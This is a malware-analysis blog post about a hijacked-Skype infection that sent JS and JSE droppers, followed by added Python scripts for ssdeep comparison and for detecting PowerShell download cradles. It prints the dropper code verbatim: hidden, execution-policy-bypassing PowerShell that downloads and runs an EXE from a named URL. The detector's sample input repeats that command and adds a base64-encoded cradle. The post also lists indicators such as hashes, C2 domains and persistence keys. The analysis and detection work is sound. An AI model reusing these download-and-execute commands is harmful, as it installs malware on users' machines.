2016/08/24

Something Phishy – 08-24-2016

by Destruct_Icon
Categories: News

Destruct_Icon here with another Something Phishy report. This one was slightly new to me, so I felt it was worth writing up. Have you had a friend or family member have their Skype account hijacked and used to spam out malicious links? That has been a pretty common situation over the past few years; this time, however, the hijacked account sent me a JS and a JSE file transfer rather than a link.


Well if the stranger is kind enough to offer some candy, I’ll be happy to take a piece! The first artifact I opened was the JS file.

File Name: camera_private parking_warning.js
MD5 Hash: acd7403a9df161da28e45594738c71ff
File Size: 331 bytes

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://sonovate.biz/templates/sb4associate8/u6yyyettd.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);

So we have PowerShell reaching out to pull down the malware. A few details are worth noting. The last argument to ShellExecute (0, SW_HIDE) hides the cmd.exe window, and -windowstyle hidden hides PowerShell's. -ExecutionPolicy bypass is belt and braces here: execution policy only governs script files, and this inline command would run regardless. And because cmd.exe expands environment variables, '%APPDATA%.exe' resolves to something like C:\Users\<user>\AppData\Roaming.exe, a file sitting next to the Roaming folder rather than inside it, which is worth remembering when you go looking for the drop. This file is pretty straightforward, so let's jump to the JSE. If you are unfamiliar with JSE, it is a JScript file obfuscated with Microsoft's Script Encoder (screnc.exe). The #@~^ ... ==^#~@ wrapper seen below is that encoder's signature, and it is reversible obfuscation, not encryption.

File Name: photo from facebook 09082016.jse
MD5 Hash: 0c2245cb8c28a83aa777ab2f202cec90
File Size: 359 bytes

#@~^TgEAAA==-mD~^k9ky.y,xP    +APzmOr7+(}8LmYvEdtV^RCw2sbmCYbGxr#I@#@&Vk[r.y"RU4VsA6mED+vEmsN +X+ES,Jz1~wKh+Md4+^Vc+a+~RA6nm!OkKxKG^kmz~(X2lkd,OUKwMW0bV~OSkUNKhdOHV+,4k9N+    ~c1h r8Ln^DPjXkO+sRHnDRn8;Vr+    O*R9Kh    VWmNwrV`vtDY2lJz/KUW7lY 8k.zD+hwsCD+dzk8cm/dG1klOnRz;vHzH+ODNc+6BBv]znKfzK)Yc+6v#p?Ym.OOhDKmn/d~E])nh9b:bY 6+vEBPEJB~rW2xr~PZ#piHIAAA==^#~@

Now to make sense of this. A bit of searching turned up a program called "Windows Script Decoder", which reverses the Script Encoder transformation. Running the decoder is as easy as pointing it at the JSE file in question and giving it an output path; the result is below.

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://sonovate.biz/templates/sb4associate8/u6yyyettd.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);

The decoded JSE is the same dropper as the JS file, byte for byte: same PowerShell command, same URL, same drop path. Let's pull down the malware and see what we can find out.

Domain: sonovate[.]biz
DomainTools: http://whois.domaintools.com/sonovate.biz
VirusTotal: https://virustotal.com/en/url/2e5ec7a0bbfcfb4e265752ec69b2e7d29fdced0bba8df5ca1fd2dd07248a6293/analysis/1471945707/


File Name: u6yyyettd.exe
MD5 Hash: a073e9a3a4666f390b3a4d6fe4dc940c
ssdeep signature: 6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSve:w/Yx/lEQ/V0nlusyHLlrzAgAmx
File Size: 400213 bytes

https://virustotal.com/en/file/d22cff35e69ecaaf0efaab07a74c04082a9ea9f7498978f6b1377d98cd6fea7c/analysis/

The file wasn't executing properly under Buster Sandbox Analyzer, but we were able to extract some details from the binary before running it. If you aren't aware of Buster Sandbox Analyzer, check it out! Note that the version information below is fake: the comment and description fields are Romanian boilerplate about a university sports faculty (FEFS Iași), and the company name is a truncated fragment of unrelated text, apparently lifted to make the binary look legitimate.

File Version : 1.0.0.125
Product Version : 1.0.0.125
Comments : FEFS organizeaza cursuri de masterat
Company Name : FlaSH ailover with redundant hardware and continuing
File Description : ultura fizica si sport, Kinetoterapie, Master invatamant zi si frecventa redusa. FEFS Iasi.. Facultatea de Educatie Fizica si Sport.
File Version : 1.00.0125
Internal Name : FiHoP
Original File Name : FiHoP.exe
Product Name : ROCKO
Product Version : 1.00.0125
Time Date Stamp : 10.08.2016 06:15

We then ran the sample on our box and were able to get some more details about the malware. The prefetch shows cmd.exe running and a new EXE spawning. u6yyyettd.exe deleted itself from the directory it was launched from, and a copy of the malware now lived at %USERPROFILE%\AppData\Roaming\Icybdykoh\keumpimebye.exe, the keumpimebye.exe seen in the prefetch.


File Name: keumpimebye.exe
MD5 Hash: 25139feab586e009fe962b20ec8f86ff
ssdeep signature: 6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSvO:w/Yx/lEQ/V0nlusyHLlrzAgAmN
File Size: 400213 bytes
Analysis MALWR: https://malwr.com/analysis/M2JkNGQ0NjY5YTgzNDMzZDk4MDllODEzM2FmZmE0N2Q/
Analysis VirusTotal: https://virustotal.com/en/file/61aaa22f1d53c0f27d57e3afeddbf53d5fd76a8390396ac22bc8b087ce1f7bd7/analysis/

Although the MD5 hash is different, the ssdeep signatures are nearly identical: the two differ only in the final character of each chunk (Sve/SvO and Amx/AmN), and the file size is the same 400213 bytes. That suggests the installed copy is the same binary with only a few bytes changed, enough to break the MD5 but not to move the fuzzy hash. Looking at the process listing, we see the same description that was pulled from the original file.
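To make the fuzzy-hash point concrete, here is an added example (not from the original post) that scores the two ssdeep signatures above against each other. It is a from-scratch reimplementation of the published ssdeep/spamsum scoring logic, kept for illustration: a signature is blocksize:chunk1:chunk2, chunks are only comparable when the block sizes are equal or differ by a factor of two, two chunks must share a 7-character window, and similarity is a weighted edit distance (insert/delete 1, substitution 2) scaled to 0-100. The small-block-size cap that ssdeep applies is omitted, so scores for tiny files may differ from the real tool; use ssdeep or its Python binding for anything beyond illustration.

```python
"""Score two ssdeep (spamsum) signatures against each other.

Reimplementation of the published ssdeep comparison for illustration only;
the small-block-size cap is omitted. Use ssdeep itself for real work.
"""
import re

ROLLING_WINDOW = 7      # two chunks must share a window this long
SPAMSUM_LENGTH = 64     # maximum chunk length in a signature


def parse_signature(sig):
    """'blocksize:chunk1:chunk2' -> (int, str, str)."""
    block, chunk1, chunk2 = sig.strip().split(":", 2)
    return int(block), chunk1, chunk2


def eliminate_sequences(s):
    """ssdeep collapses runs longer than three identical characters to three."""
    return re.sub(r"(.)\1{3,}", r"\1\1\1", s)


def has_common_substring(a, b):
    """Gate: the chunks must share at least one ROLLING_WINDOW-length substring."""
    return any(a[i:i + ROLLING_WINDOW] in b for i in range(len(a) - ROLLING_WINDOW + 1))


def edit_distance(a, b):
    """Levenshtein with insert/delete cost 1 and substitution cost 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                            # delete ca
                           cur[j - 1] + 1,                         # insert cb
                           prev[j - 1] + (0 if ca == cb else 2)))  # substitute
        prev = cur
    return prev[-1]


def score_chunks(a, b):
    """0-100 similarity of two chunks built at the same block size."""
    a, b = eliminate_sequences(a), eliminate_sequences(b)
    if not has_common_substring(a, b):
        return 0
    score = edit_distance(a, b) * SPAMSUM_LENGTH // (len(a) + len(b))
    score = 100 * score // SPAMSUM_LENGTH
    return 0 if score >= 100 else 100 - score


def compare(sig_a, sig_b):
    """0-100 similarity of two full signatures; 0 when they are not comparable."""
    ba, a1, a2 = parse_signature(sig_a)
    bb, b1, b2 = parse_signature(sig_b)
    if (ba, a1, a2) == (bb, b1, b2):
        return 100
    if ba == bb:
        return max(score_chunks(a1, b1), score_chunks(a2, b2))
    if ba == 2 * bb:     # a's first chunk was built at the block size of b's second
        return score_chunks(a1, b2)
    if bb == 2 * ba:
        return score_chunks(a2, b1)
    return 0             # block sizes too far apart to compare


# The two signatures from this post: the downloaded dropper and the
# copy it installed under AppData\Roaming.
SIG_DOWNLOADED = "6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSve:w/Yx/lEQ/V0nlusyHLlrzAgAmx"
SIG_INSTALLED = "6144:qGTA/YxpHHFS4EKH/BbWlJtT7qCeHQjbXBcsBwH+clrzy3/gANsSvO:w/Yx/lEQ/V0nlusyHLlrzAgAmN"

if __name__ == "__main__":
    print(compare(SIG_DOWNLOADED, SIG_INSTALLED))   # 99: near-identical, not identical
```

On the two signatures from this post the script returns 99 rather than 100: the files are near-identical but are not the same bytes, which is exactly what a changed MD5 with an unchanged size suggests.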


This process also set up persistence in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, with a value pointing right back to the malware in the Roaming folder.


Another noteworthy file, created the moment the infection happened, was dumped in a randomly named folder under AppData\Roaming. It was called nuavnias.tmp, held about 12KB of data, and looked encoded at a quick glance. We have seen a lot of similar malware stash data in .tmp files that sit waiting for a C2 command to pull them out.

Speaking of C2, the last quick tidbit was the domains being requested. The sample alternated between two domains that look algorithmically generated: xcbvmxcmvoiurei[.]ru and sjkdhfjkdsf[.]ru.

Thank you for taking a quick gander at this Something Phishy report. It was interesting to see a new infection vector via Skype through a JSE file. Despite the JavaScript wrapper, everything revolved around the PowerShell payload-retrieval command. If you are in a business setting, PLEASE keep an eye out for System.Net.WebClient .DownloadFile (or .DownloadString) calls in PowerShell command lines, as well as encoded PowerShell (-EncodedCommand); both have been a very strong indicator of malware for us. I will be adding all of the information from this report to our intel feed in the next day or so.
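As an added example (not part of the original post), here is the kind of check the last paragraph recommends, written in Python so it can run offline against exported process-creation logs. The input lines are constructed to look like the CommandLine field of Sysmon Event ID 1 or Windows 4688 records: the first is the exact command the JS/JSE dropper on this page runs, the second is a constructed -EncodedCommand variant of the same cradle (the URL example.com/stage2.ps1 is made up), and the third is a benign admin one-liner. The indicator names and the flagging rule are this example's own, not from any vendor signature set.

```python
"""Flag PowerShell download cradles in process command lines.

Constructed example input: lines shaped like the CommandLine field of
process-creation telemetry (Sysmon Event ID 1 / Security 4688).
"""
import base64
import re

# Indicators a defender sees in cradles like the one in this post.
# Names and thresholds are this example's own choices, not a vendor rule set.
INDICATORS = {
    # (New-Object System.Net.WebClient).DownloadFile( / .DownloadString(
    "download_cradle": re.compile(r"Net\.WebClient\)?\s*\.\s*Download(?:File|String)\s*\(", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+(?:bypass|unrestricted)", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # -EncodedCommand and its short forms, followed by a base64 blob
    "encoded_command": re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I),
    # dropping the payload under %APPDATA% / AppData\Roaming
    "appdata_drop": re.compile(r"%APPDATA%|\\AppData\\Roaming", re.I),
}
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline):
    """Return which indicators fire on a command line, any URLs it carries,
    and the decoded script if it used -EncodedCommand."""
    texts = [cmdline]
    decoded = None
    m = INDICATORS["encoded_command"].search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            texts.append(decoded)          # inspect the decoded script as well
    hits = sorted({name for name, rx in INDICATORS.items()
                   for text in texts if rx.search(text)})
    urls = [u for text in texts for u in URL.findall(text)]
    # A download cradle is enough on its own; otherwise require two indicators
    # so a lone "-w hidden" from a scheduled task is not flagged by itself.
    suspicious = "download_cradle" in hits or len(hits) >= 2
    return {"suspicious": suspicious, "hits": hits, "urls": urls, "decoded": decoded}


def flagged(lines):
    """Indexes of the command lines that assess() marks suspicious."""
    return [i for i, line in enumerate(lines) if assess(line)["suspicious"]]


# --- constructed sample input ---------------------------------------------
# 1. the exact command the JS/JSE dropper in this post runs
DROPPER_CMD = ("cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden "
               "(New-Object System.Net.WebClient).DownloadFile("
               "'http://sonovate.biz/templates/sb4associate8/u6yyyettd.exe','%APPDATA%.exe');"
               "Start-Process '%APPDATA%.exe'")
# 2. a constructed -EncodedCommand variant of the same cradle (URL is made up)
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/stage2.ps1')"
ENCODED_CMD = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
    STAGE2_SCRIPT.encode("utf-16-le")).decode()
# 3. a benign administrative one-liner
BENIGN_CMD = 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'

SAMPLE_LINES = [DROPPER_CMD, ENCODED_CMD, BENIGN_CMD]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LINES):
        r = assess(line)
        print(i, "SUSPICIOUS" if r["suspicious"] else "ok", r["hits"], r["urls"])
```

Run as-is it flags the first two lines and passes the third. In an environment where management tooling legitimately uses -EncodedCommand, keep the decode step (it surfaces the real command for triage) but tune the two-indicator threshold rather than alerting on encoding alone.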

